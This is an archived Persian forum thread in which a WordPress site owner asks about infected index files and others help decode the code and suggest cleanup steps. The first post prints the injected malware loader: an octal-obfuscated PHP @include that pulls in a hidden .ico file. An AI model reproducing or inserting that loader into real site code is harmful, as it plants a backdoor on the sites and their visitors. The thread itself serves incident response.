PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : سوال و راهنمایی در مورد فایل های ویروسی وب سایت وردپرسی


1wp.ir
October 7th, 2020, 18:01
یه سایتی هست که تقریبا تمام فایل های ایندکس اون اولش یه همچین کدهایی اضافه شده .





/*658df*/

@include "\057h\157m\145/\152e\146t\150e\165j\057p\165b\154i\143_\150t\155l \0154o\143k\163/\166e\162s\145/\056b\0718\1445\1460\060.\151c\157";

/*658df*/





دوستان و بزرگواران در این زمینه تجربه یا اطلاعی دارن؟
sam_pontiac
October 7th, 2020, 18:27
انکود شده Hex
خروجی دیکد شده این کد شما :

/home/jeftheuj/public_html
4ocks/verse/.b98d5f00.ico

اما اینکه چرا در همه فایلها هست، نیاز به بررسی داره که خودتون میتونید انجام بدید.
این ترکیبی از کاراکترهای استاندارد و ASCII اکتال هست. که مثلا شماره 057 که داخل کد شما هست، نمایانگر اسلش / هست و 157 نمایانگر حرف O

اطلاعات در خصوص Regex تو PHP ( لینک (https://www.php.net/manual/en/regexp.reference.escape.php))
سایت روی هاست اشتراکی هست یا سرور اختصاصی و مجازی و ...؟
اگر دسترسی روت دارید، یکسری از توابع PHP رو باید غیرفعال کنید.
یه اسکن هم لازم هست در کل.
اگر که سایت وردپرس هست، نیاز دارید پلاگین‌ها رو چک کنید و ببینید پلاگین یا پوسته‌ای بک دور داره یا نه.
1wp.ir
October 7th, 2020, 18:57
انکود شده Hex
خروجی دیکد شده این کد شما :

/home/jeftheuj/public_html
4ocks/verse/.b98d5f00.ico

اما اینکه چرا در همه فایلها هست، نیاز به بررسی داره که خودتون میتونید انجام بدید.
این ترکیبی از کاراکترهای استاندارد و ASCII اکتال هست. که مثلا شماره 057 که داخل کد شما هست، نمایانگر اسلش / هست و 157 نمایانگر حرف O

اطلاعات در خصوص Regex تو PHP ( لینک (https://www.php.net/manual/en/regexp.reference.escape.php))
سایت روی هاست اشتراکی هست یا سرور اختصاصی و مجازی و ...؟
اگر دسترسی روت دارید، یکسری از توابع PHP رو باید غیرفعال کنید.
یه اسکن هم لازم هست در کل.
اگر که سایت وردپرس هست، نیاز دارید پلاگین‌ها رو چک کنید و ببینید پلاگین یا پوسته‌ای بک دور داره یا نه.


ممنون و سپاسگزارم بابت راهنمایی تون .

بله دسترسی هاست دارم .

اگر دسترسی روت دارید، یکسری از توابع PHP رو باید غیرفعال کنید.
دقیقا چه توابعی رو باید غیرفعال کنم ؟


یه اسکن هم لازم هست در کل.
دقیقا با چی باید اسکن کنم ؟


نیاز دارید پلاگین‌ها رو چک کنید و ببینید پلاگین یا پوسته‌ای بک دور داره یا نه.
چطور میشه این مورد رو تشخیص داد که بک دور داره یا نه ؟
ahamddr
October 7th, 2020, 19:55
سلام
یه سری از سایت ها هستند که اسکن قالب و پلاگین ها رو برای ویروسی بودنشون انجام میدن.
آیا میشه به اون سایتا اعتماد کرد و این جور کد ها رو هم برسی میکنن؟